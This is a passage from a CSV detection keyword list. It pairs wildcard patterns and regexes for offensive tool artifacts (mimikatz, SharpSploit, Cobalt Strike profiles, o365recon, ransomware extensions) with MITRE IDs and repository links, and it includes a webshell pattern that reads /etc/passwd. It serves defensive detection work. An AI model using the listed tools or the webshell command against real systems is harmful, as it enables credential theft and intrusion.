hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*.LateralMovement.PowerShellRemoting*",".{0,1000}\.LateralMovement\.PowerShellRemoting.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*.LateralMovement.SCM.*",".{0,1000}\.LateralMovement\.SCM\..{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*.LateralMovement.WMI.WMIExecute(*",".{0,1000}\.LateralMovement\.WMI\.WMIExecute\(.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that 
aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*.ldapdump.txt*",".{0,1000}\.ldapdump\.txt.{0,1000}","offensive_tool_keyword","msldapdump","LDAP enumeration tool implemented in Python3","T1018 - T1210.001","TA0007 - TA0001","N/A","N/A","Reconnaissance","https://github.com/dievus/msLDAPDump","1","1","N/A","N/A","3","215","29","2023-08-14T13:15:29Z","2022-12-30T23:35:40Z" "*.link/links/windows/target/x86_64-pc-windows-gnu/release/link.exe*",".{0,1000}\.link\/links\/windows\/target\/x86_64\-pc\-windows\-gnu\/release\/link\.exe.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","1","N/A","10","10","540","88","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z" "*.lists.123456.*",".{0,1000}\.lists\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - 
T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.live.123456.*",".{0,1000}\.live\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" 
"*.local.kirbi*",".{0,1000}\.local\.kirbi.{0,1000}","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/nidem/kerberoast","1","1","N/A","N/A","10","1352","314","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z" "*.m.123456.*",".{0,1000}\.m\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.mail.123456.*",".{0,1000}\.mail\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - 
T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.media.123456.*",".{0,1000}\.media\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - 
TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.mobile.123456.*",".{0,1000}\.mobile\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.mysql.123456.*",".{0,1000}\.mysql\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging 
signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.news.123456.*",".{0,1000}\.news\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - 
T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.nimplant*",".{0,1000}\.nimplant.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*.O365.GroupMembership_AdminGroups.txt*",".{0,1000}\.O365\.GroupMembership_AdminGroups\.txt.{0,1000}","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","0","N/A","7","7","657","98","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z" "*.O365.GroupMembership_VPNGroups.txt*",".{0,1000}\.O365\.GroupMembership_VPNGroups\.txt.{0,1000}","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","0","N/A","7","7","657","98","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z" "*.O365.Roles_Admins.txt*",".{0,1000}\.O365\.Roles_Admins\.txt.{0,1000}","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - 
TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","0","N/A","7","7","657","98","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z" "*.O365.Users_Detailed.csv*",".{0,1000}\.O365\.Users_Detailed\.csv.{0,1000}","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","0","N/A","7","7","657","98","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z" "*.O365.Users_LDAP_details.txt*",".{0,1000}\.O365\.Users_LDAP_details\.txt.{0,1000}","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","0","N/A","7","7","657","98","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z" "*.O365.Users_ProxyAddresses.txt*",".{0,1000}\.O365\.Users_ProxyAddresses\.txt.{0,1000}","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","0","N/A","7","7","657","98","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z" "*.onion/chat.html?*",".{0,1000}\.onion\/chat\.html\?.{0,1000}","offensive_tool_keyword","SunCrypt","SunCrypt ransomware","T1486 - T1490","TA0040","N/A","N/A","Ransomware","https://github.com/rivitna/Malware","1","0","#yara","10","3","261","38","2024-05-01T19:21:20Z","2021-07-28T21:00:52Z" "*.onion:31337*",".{0,1000}\.onion\:31337.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","N/A","Defense 
Evasion","https://github.com/cmars/onionpipe","1","1","N/A","10","5","449","29","2024-04-27T15:07:14Z","2022-01-23T06:52:13Z" "*.onion:8000*",".{0,1000}\.onion\:8000.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/cmars/onionpipe","1","1","N/A","10","5","449","29","2024-04-27T15:07:14Z","2022-01-23T06:52:13Z" "*.onion:81*",".{0,1000}\.onion\:81.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/cmars/onionpipe","1","0","N/A","10","5","449","29","2024-04-27T15:07:14Z","2022-01-23T06:52:13Z" "*.pdf.bat*",".{0,1000}\.pdf\.bat.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.pdf.dll*",".{0,1000}\.pdf\.dll.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.pdf.exe*",".{0,1000}\.pdf\.exe.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.pdf.htm",".{0,1000}\.pdf\.htm.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.pdf.iso*",".{0,1000}\.pdf\.iso.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 
- T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.pdf.jar*",".{0,1000}\.pdf\.jar.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.pdf.jasmin*",".{0,1000}\.pdf\.jasmin.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*.pdf.js*",".{0,1000}\.pdf\.js.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.pdf.sfx*",".{0,1000}\.pdf\.sfx.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.pdf.vbs*",".{0,1000}\.pdf\.vbs.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.photos.123456.*",".{0,1000}\.photos\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - 
T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.php?cmd=cat+/etc/passwd*",".{0,1000}\.php\?cmd\=cat\+\/etc\/passwd.{0,1000}","offensive_tool_keyword","webshell","A collection of webshell","T1505.003 - T1100 - T1190 - T1505.004","TA0003 - TA0011 ","N/A","N/A","Persistence","https://github.com/Peaky-XD/webshell","1","1","N/A","10","1","48","11","2024-03-02T05:51:24Z","2024-02-28T15:12:42Z" "*.pic.123456.*",".{0,1000}\.pic\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - 
T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.pipename_stager*",".{0,1000}\.pipename_stager.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" 
"*.png.jasmin*",".{0,1000}\.png\.jasmin.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*.pop.123456.*",".{0,1000}\.pop\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 